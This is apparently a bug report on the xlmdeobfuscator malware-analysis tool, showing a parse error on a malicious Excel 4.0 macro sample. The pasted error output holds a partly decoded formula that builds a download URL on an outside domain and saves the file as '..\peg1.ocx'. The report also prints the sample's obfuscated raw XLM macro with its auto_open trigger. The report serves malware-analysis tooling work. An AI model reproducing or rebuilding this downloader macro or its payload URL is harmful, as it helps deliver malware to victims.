Error: Unexpected token Token('__ANON_0', ':"&"//")&"su")&"bb")& ...') #111
Labels
bug
Something isn't working
Comments
https://www.virustotal.com/gui/file/756186368250a9902ae168c2f0c6a77d3fdd70f7a5589c36f8c7bd80cf8756e4 is another sample with this problem. I've looked a bit into this issue and it looks like there are 2 problems with analyzing the sample:
Running xlmdeobfuscator on this file:
https://www.virustotal.com/gui/file/a0de1f3af78bef68ddfcabf4b7cedfa0e466ac65648a5e81e591702b463c96b1
gives the following error:
Unencrypted xls file
[Loading Cells]
auto_open: auto_open->'KBRSBTL'!$J$1
[Starting Deobfuscation]
CELL:J12 , FullEvaluation , "False"
Error [deobfuscator.py:2586 parse_tree = self.xlm_parser.parse(formula)]: Unexpected token Token('__ANON_0', ':"&"//")&"su")&"bb")&"al")&"ak")&"sh")&"mi.c")&"o")&"m/d")&"a",25352.0)=TEXT(((((("t"&"a_w")&"in")&"ni")&"ng/k")&"Yv6")&"xb/",3646.0)","..\peg1.ocx",0,0)') at line 1, column 69.
Expected one of:
* MULTIOP
* ADDITIVEOP
* CMPOP
* LIST_SEPARATOR
* L_PRA
* R_PRA
* CONCATOP
Previous tokens: [Token('STRING', '"http=TEXT(((((((((("')]
The raw XLM macro, as extracted by olevba, is:
' RAW EXCEL4/XLM MACRO FORMULAS:
' SHEET: KBRSBTL, Macrosheet
' CELL:J12, =(((((((FORMULA((((((((((((('KBSNTND'!L24&'KBSNTND'!L26)&'KBSNTND'!L27)&'KBSNTND'!L28)&'KBSNTND'!L28)&'ORHINSNR'!L11)&'ORHINSNR'!D18)&'KBSNTND'!F10)&'ORHINSNR'!S22)&'SGGSBe'!O6)&'ORHINSNR'!G24)&'THJD'!D15)&'SGGSBe'!D8)&'THJD'!R19,J15)=FORMULA((((((((((((((((((('KBSNTND'!L24&'KBSNTND'!G8)&'KBSNTND'!F4)&'KBSNTND'!G8)&'KBSNTND'!O3)&'KBSNTND'!L30)&'KBSNTND'!F24)&'KBSNTND'!O3)&'THJD'!J11)&'THJD'!C5)&'KBSNTND'!A4)&'THJD'!H22)&'KBSNTND'!A4)&'THJD'!B19)&'KBSNTND'!F10)&'THJD'!L26)&'THJD'!P2)&'SGGSBe'!D8)&'KBSNTND'!F24)&'KBSNTND'!L31,J17))=FORMULA((((((((((((('KBSNTND'!L24&'KBSNTND'!L26)&'KBSNTND'!L27)&'KBSNTND'!L28)&'KBSNTND'!L28)&'ORHINSNR'!L11)&'ORHINSNR'!D18)&'KBSNTND'!F10)&'ORHINSNR'!S22)&'SGGSBe'!O6)&'ORHINSNR'!H26)&'THJD'!D15)&'SGGSBe'!H13)&'THJD'!R19,J19))=FORMULA((((((((((((((((((('KBSNTND'!L24&'KBSNTND'!G8)&'KBSNTND'!F4)&'KBSNTND'!G8)&'KBSNTND'!O3)&'KBSNTND'!L30)&'KBSNTND'!F24)&'KBSNTND'!O3)&'THJD'!J11)&'THJD'!C5)&'KBSNTND'!A4)&'THJD'!H22)&'KBSNTND'!A4)&'THJD'!B19)&'KBSNTND'!F10)&'THJD'!L26)&'THJD'!P2)&'SGGSBe'!H13)&'KBSNTND'!F24)&'KBSNTND'!L31,J21))=FORMULA((((((((((((('KBSNTND'!L24&'KBSNTND'!L26)&'KBSNTND'!L27)&'KBSNTND'!L28)&'KBSNTND'!L28)&'ORHINSNR'!L11)&'ORHINSNR'!D18)&'KBSNTND'!F10)&'ORHINSNR'!S22)&'SGGSBe'!O6)&'ORHINSNR'!I24)&'THJD'!D15)&'SGGSBe'!M3)&'THJD'!R19,J23))=FORMULA((((((((((((((((((('KBSNTND'!L24&'KBSNTND'!G8)&'KBSNTND'!F4)&'KBSNTND'!G8)&'KBSNTND'!O3)&'KBSNTND'!L30)&'KBSNTND'!F24)&'KBSNTND'!O3)&'THJD'!J11)&'THJD'!C5)&'KBSNTND'!A4)&'THJD'!H22)&'KBSNTND'!A4)&'THJD'!B19)&'KBSNTND'!F10)&'THJD'!L26)&'THJD'!P2)&'SGGSBe'!M3)&'KBSNTND'!F24)&'KBSNTND'!L31,J25))=FORMULA((((((((((((('KBSNTND'!L24&'KBSNTND'!L26)&'KBSNTND'!L27)&'KBSNTND'!L28)&'KBSNTND'!L28)&'ORHINSNR'!L11)&'ORHINSNR'!D18)&'KBSNTND'!F10)&'ORHINSNR'!S22)&'SGGSBe'!O6)&'ORHINSNR'!J26)&'THJD'!D15)&'SGGSBe'!R17)&'THJD'!R19,J27))=FORMULA((((((((((((((((((('KBSNTND'!L24&'KBSNTND'!G8)&'KBSNTND'!F4)&'KBSNTND'!G8)&'KBSNTND'!O3)&'KBSNTND'!L30)&'KBSNTND'!F24)&'KBSNTND'!O3)&'THJD'!J11)&'THJD'!C5)&
'KBSNTND'!A4)&'THJD'!H22)&'KBSNTND'!A4)&'THJD'!B19)&'KBSNTND'!F10)&'THJD'!L26)&'THJD'!P2)&'SGGSBe'!R17)&'KBSNTND'!F24)&'KBSNTND'!L31,J29))=FORMULA((('KBSNTND'!L24&'KBSNTND'!G44)&'KBSNTND'!H46)&'KBSNTND'!J44,J49), 1